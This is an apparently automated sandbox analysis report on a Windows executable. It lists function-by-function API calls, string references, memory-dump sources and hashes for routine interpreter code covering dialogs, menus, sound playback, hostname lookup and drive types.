MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00EEF88D

Strings

Error: , xrefs: 00EEF85B
Line %d:, xrefs: 00EEF818
Line %d (File "%s"):, xrefs: 00EEF833
%s (%d) : ==> %s.: %s %s, xrefs: 00EEF7F7
., xrefs: 00EEF873

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 6d03b7787ae312c019b4359b2a67eae191b2f19a94568737ea743ab1d344191d
Instruction ID: 1c21d43a926e52fdf1fbb088211981e0e0bef1ae8bb0112ea314071dbb34b286
Opcode Fuzzy Hash: 6d03b7787ae312c019b4359b2a67eae191b2f19a94568737ea743ab1d344191d
Instruction Fuzzy Hash: 1921513291021DFBCF16EFA0CC4AEEE77B9BF18300F045466F515760A1EA71A618DB51

Function 00EF52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00E97BCC: _memmove.LIBCMT ref: 00E97C06

Part of subcall function 00E97924: _memmove.LIBCMT ref: 00E979AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00EF5330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00EF5346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EF5357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00EF5369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00EF537A

Strings

close PlayMe, xrefs: 00EF5341, 00EF536E
play PlayMe, xrefs: 00EF5375
status PlayMe mode, xrefs: 00EF532B
play PlayMe wait, xrefs: 00EF5364
alias PlayMe, xrefs: 00EF5309
open , xrefs: 00EF52DF

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 5b5370e4cab81116414c001e5dd99f736c5fb2423aca9f297fa9d2aa4aeafca9
Instruction ID: 339723cdbd6cf2cb6f1f25c965849f19c76e8b5c6b1b35f94b1eaecb6f465a1c
Opcode Fuzzy Hash: 5b5370e4cab81116414c001e5dd99f736c5fb2423aca9f297fa9d2aa4aeafca9
Instruction Fuzzy Hash: 2E11E221AA412D79DB20B665DC4ADFFBFBCEBE1B84F400429B901B20D1EEA04C09C5A1

Function 00EF46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00EF46D2
gethostname.WSOCK32(?,00000100), ref: 00EF46EC
gethostbyname.WSOCK32(?), ref: 00EF46F9
_wcscpy.LIBCMT ref: 00EF4721
_memmove.LIBCMT ref: 00EF4734
inet_ntoa.WSOCK32(?), ref: 00EF473F
_strcat.LIBCMT ref: 00EF474D
_wcscpy.LIBCMT ref: 00EF4764
WSACleanup.WSOCK32 ref: 00EF4772
_wcscpy.LIBCMT ref: 00EF4780

Strings

0.0.0.0, xrefs: 00EF471B

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: b576d167ed02bf46c8fc7cf8bbe188444b874e53fd25d8b3ce9ab90f537a6470
Instruction ID: 604083a6ed0b24f3d13f922b66c7ec494a004804b617055672826718c31f1061
Opcode Fuzzy Hash: b576d167ed02bf46c8fc7cf8bbe188444b874e53fd25d8b3ce9ab90f537a6470
Instruction Fuzzy Hash: EB11F07190410CAFCB20BB309C4AEEB77BCEF02321F4451BAF645A20E1EB71DA859A50

Function 00EF4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00EF4F7A

Part of subcall function 00EB049F: timeGetTime.WINMM(?,7608B400,00EA0E7B), ref: 00EB04A3

Sleep.KERNEL32(0000000A), ref: 00EF4FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00EF4FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00EF4FEC
SetActiveWindow.USER32 ref: 00EF500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00EF5019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00EF5038
Sleep.KERNEL32(000000FA), ref: 00EF5043
IsWindow.USER32 ref: 00EF504F
EndDialog.USER32(00000000), ref: 00EF5060

Strings

BUTTON, xrefs: 00EF4FDE

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: de2fd7b0f6adad5ec3ecdc9fb697a197f3a66ff259c8c4e0e6b8c0ed3a824452
Instruction ID: fb2e8a195c82541a8c623c4d7a4fd99aede6456cc8022c460a3a6e97475cc476
Opcode Fuzzy Hash: de2fd7b0f6adad5ec3ecdc9fb697a197f3a66ff259c8c4e0e6b8c0ed3a824452
Instruction Fuzzy Hash: 4421CF7224070DAFE7119F20EC88A763BA9EB1474AF096024F315E21B5DB318D05BA61

Function 00EFD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E99837: __itow.LIBCMT ref: 00E99862
Part of subcall function 00E99837: __swprintf.LIBCMT ref: 00E998AC

CoInitialize.OLE32(00000000), ref: 00EFD5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EFD67D
SHGetDesktopFolder.SHELL32(?), ref: 00EFD691
CoCreateInstance.OLE32(00F22D7C,00000000,00000001,00F48C1C,?), ref: 00EFD6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EFD74C
CoTaskMemFree.OLE32(?,?), ref: 00EFD7A4
_memset.LIBCMT ref: 00EFD7E1
SHBrowseForFolderW.SHELL32(?), ref: 00EFD81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EFD840
CoTaskMemFree.OLE32(00000000), ref: 00EFD847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00EFD87E
CoUninitialize.OLE32(00000001,00000000), ref: 00EFD880

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: bddafd33ba3e8d8ad67ed80eeda9ade8dc9db48bab3963df61d7ff93e16dfa13
Instruction ID: 9e183428f01676f393cb11bafe88bcc9825a76386f1ec780154bda3cea27dc3d
Opcode Fuzzy Hash: bddafd33ba3e8d8ad67ed80eeda9ade8dc9db48bab3963df61d7ff93e16dfa13
Instruction Fuzzy Hash: 9BB1EA75A00109AFDB04DFA8CC85DAEBBF9FF48314B159469E909EB261DB30ED45CB50

Function 00EEC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00EEC283
GetWindowRect.USER32(00000000,?), ref: 00EEC295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00EEC2F3
GetDlgItem.USER32(?,00000002), ref: 00EEC2FE
GetWindowRect.USER32(00000000,?), ref: 00EEC310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00EEC364
GetDlgItem.USER32(?,000003E9), ref: 00EEC372
GetWindowRect.USER32(00000000,?), ref: 00EEC383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00EEC3C6
GetDlgItem.USER32(?,000003EA), ref: 00EEC3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00EEC3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 00EEC3FE

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 48362b3453da5133f67ea4f5caccc1c0ab331f106ab2df330eb646c4466908c6
Instruction ID: da9c98d1cdd37c8d78d1195fe38f986b14f0da41918cdf9650a726f7ba92d5fa
Opcode Fuzzy Hash: 48362b3453da5133f67ea4f5caccc1c0ab331f106ab2df330eb646c4466908c6
Instruction Fuzzy Hash: 2C514171B00209AFDB18CFA9DD99AAEBBBAFB88710F14812DF515E7290D7709D058B10

Function 00E9201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00E91B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E92036,?,00000000,?,?,?,?,00E916CB,00000000,?), ref: 00E91B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E920D3
KillTimer.USER32(-00000001,?,?,?,?,00E916CB,00000000,?,?,00E91AE2,?,?), ref: 00E9216E
DestroyAcceleratorTable.USER32(00000000), ref: 00ECBCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E916CB,00000000,?,?,00E91AE2,?,?), ref: 00ECBCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E916CB,00000000,?,?,00E91AE2,?,?), ref: 00ECBCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E916CB,00000000,?,?,00E91AE2,?,?), ref: 00ECBD0A
DeleteObject.GDI32(00000000), ref: 00ECBD1C

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 63519b49ffcf7e09aaecdf80d3089592fc450b6a95407461889990c296599d4a
Instruction ID: c1fe455740c41be71d4ccffd09ce67a233974b0854f02a3ab666f4f4c7e3218b
Opcode Fuzzy Hash: 63519b49ffcf7e09aaecdf80d3089592fc450b6a95407461889990c296599d4a
Instruction Fuzzy Hash: FD61CE30501B08EFCF359F15D959B6ABBF1FF44716F10A42CE642AA6B0C771A896EB40

Function 00E921A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00E925DB: GetWindowLongW.USER32(?,000000EB), ref: 00E925EC

GetSysColor.USER32(0000000F), ref: 00E921D3

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 42be21ccaf2b8ed5b563cb47fd6e86d836fbeaf818d11f91861584242d57111d
Instruction ID: f81902fc76d59edbd547275cfb40ad29d35702b7a762a3f0d44862f941fa3bb8
Opcode Fuzzy Hash: 42be21ccaf2b8ed5b563cb47fd6e86d836fbeaf818d11f91861584242d57111d
Instruction Fuzzy Hash: AE41A031004544BFDF255F28AC88BF93B66EB06725F199269FE65AA1F1C7318C42EB11

Function 00EFA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00F1F910), ref: 00EFA90B
GetDriveTypeW.KERNEL32(00000061,00F489A0,00000061), ref: 00EFA9D5
_wcscpy.LIBCMT ref: 00EFA9FF

Strings

network, xrefs: 00EFA969
fixed, xrefs: 00EFA953
ramdisk, xrefs: 00EFA97F
all, xrefs: 00EFA911
cdrom, xrefs: 00EFA927
removable, xrefs: 00EFA93D
unknown, xrefs: 00EFA996

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: a6222e37fdc99ba1e17639c19b79e9c8857848b7e11f9b5091627c7d10add8c3
Instruction ID: a3933743b113e861dad47fd194f477f7743ea4ba112a15541d932fa47300699f
Opcode Fuzzy Hash: a6222e37fdc99ba1e17639c19b79e9c8857848b7e11f9b5091627c7d10add8c3
Instruction Fuzzy Hash: CA51CE71118304ABC710EF14D892ABFB7E5EF84744F14683DF9996B2A2DB70D909CA53

Function 00E99837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00E99862
__swprintf.LIBCMT ref: 00E998AC
__i64tow.LIBCMT ref: 00ECF5E6

Strings

True, xrefs: 00ECF5A7
False, xrefs: 00ECF5AE
0x%p, xrefs: 00ECF5C8
%.15g, xrefs: 00E998A6

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 2e8b44283e865c7a2e2eb03026aa5229165a74e4831c4af605726bc7bac1a6e0
Instruction ID: d443cb67d217802abbe158fd6cb5fcdbf2c8a0967a5888545ea57cf8e25f3bb0
Opcode Fuzzy Hash: 2e8b44283e865c7a2e2eb03026aa5229165a74e4831c4af605726bc7bac1a6e0
Instruction Fuzzy Hash: 3C41D671500205AFDF28DF38D942EBA77E9EF45304F20546EE649F7292EA32ED429B11

Function 00F17152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F1716A
CreateMenu.USER32 ref: 00F17185
SetMenu.USER32(?,00000000), ref: 00F17194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F17221
IsMenu.USER32(?), ref: 00F17237
CreatePopupMenu.USER32 ref: 00F17241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F1726E
DrawMenuBar.USER32 ref: 00F17276

Strings

F, xrefs: 00F17262
0, xrefs: 00F17160

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 0ca58fcc61168fc526d681e908c0e0fc6d7258efa4451b636d7245707e2b6a64
Instruction ID: 3bdd6c4e2aa47a687b578658c5401b63232c1781cc797d77c97ce18b99a3553f
Opcode Fuzzy Hash: 0ca58fcc61168fc526d681e908c0e0fc6d7258efa4451b636d7245707e2b6a64
Instruction Fuzzy Hash: E3412675A01209AFDB20EF65D844ADABBF5FF48311F154029F909A7361D731A914EF90

Function 00F174BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F1755E
CreateCompatibleDC.GDI32(00000000), ref: 00F17565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F17578
SelectObject.GDI32(00000000,00000000), ref: 00F17580
GetPixel.GDI32(00000000,00000000,00000000), ref: 00F1758B
DeleteDC.GDI32(00000000), ref: 00F17594
GetWindowLongW.USER32(?,000000EC), ref: 00F1759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F175B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F175BE

Strings

static, xrefs: 00F174F6

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 99ba99c9601c96917c49635c88f6e92a90a42c4fdfb1389c3887f6a34f440cb0
Instruction ID: 27fd9009325e2be3e6545808bc2f3fc9eb4d76b6f4fbb084b7f0120914e57bfb
Opcode Fuzzy Hash: 99ba99c9601c96917c49635c88f6e92a90a42c4fdfb1389c3887f6a34f440cb0
Instruction Fuzzy Hash: 00317C32504219BBDF12AF64DC08FDB3B7AFF09361F154224FA19A61A0C735D855EBA4

Function 00EB6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EB6E3E

Part of subcall function 00EB8B28: __getptd_noexit.LIBCMT ref: 00EB8B28

__gmtime64_s.LIBCMT ref: 00EB6ED7
__gmtime64_s.LIBCMT ref: 00EB6F0D
__gmtime64_s.LIBCMT ref: 00EB6F2A
__allrem.LIBCMT ref: 00EB6F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EB6F9C
__allrem.LIBCMT ref: 00EB6FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EB6FD1
__allrem.LIBCMT ref: 00EB6FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EB7006
__invoke_watson.LIBCMT ref: 00EB7077

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: d6ee44d51c9b95cd9f49e8e2ef387766151ae77a16722b7a5eb00ee085188ae0
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: 5871F676A00716ABD714AE78DC41BEBB7F8AF44324F14922EF554F66C1E774DA008B90

Function 00EF2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EF2542
GetMenuItemInfoW.USER32(00F55890,000000FF,00000000,00000030), ref: 00EF25A3
SetMenuItemInfoW.USER32(00F55890,00000004,00000000,00000030), ref: 00EF25D9
Sleep.KERNEL32(000001F4), ref: 00EF25EB
GetMenuItemCount.USER32(?), ref: 00EF262F
GetMenuItemID.USER32(?,00000000), ref: 00EF264B
GetMenuItemID.USER32(?,-00000001), ref: 00EF2675
GetMenuItemID.USER32(?,?), ref: 00EF26BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EF2700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EF2714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EF2735

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: be1e2a11464d91b7d90703ee447c34733929d29492fc22b976a23a691ca5eac6
Instruction ID: a2dead9652ce343e81957a77582edd3afc2e97284d06b37b9ba8b444b990696f
Opcode Fuzzy Hash: be1e2a11464d91b7d90703ee447c34733929d29492fc22b976a23a691ca5eac6
Instruction Fuzzy Hash: 296179B090024DAFDB11DFA4DC989FEBBA9EB41308F15506EEB42B7291D731AD05DB21

Function 00F16F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F16FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F16FA8
GetWindowLongW.USER32(?,000000F0), ref: 00F16FCC
_memset.LIBCMT ref: 00F16FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F16FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F17067

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
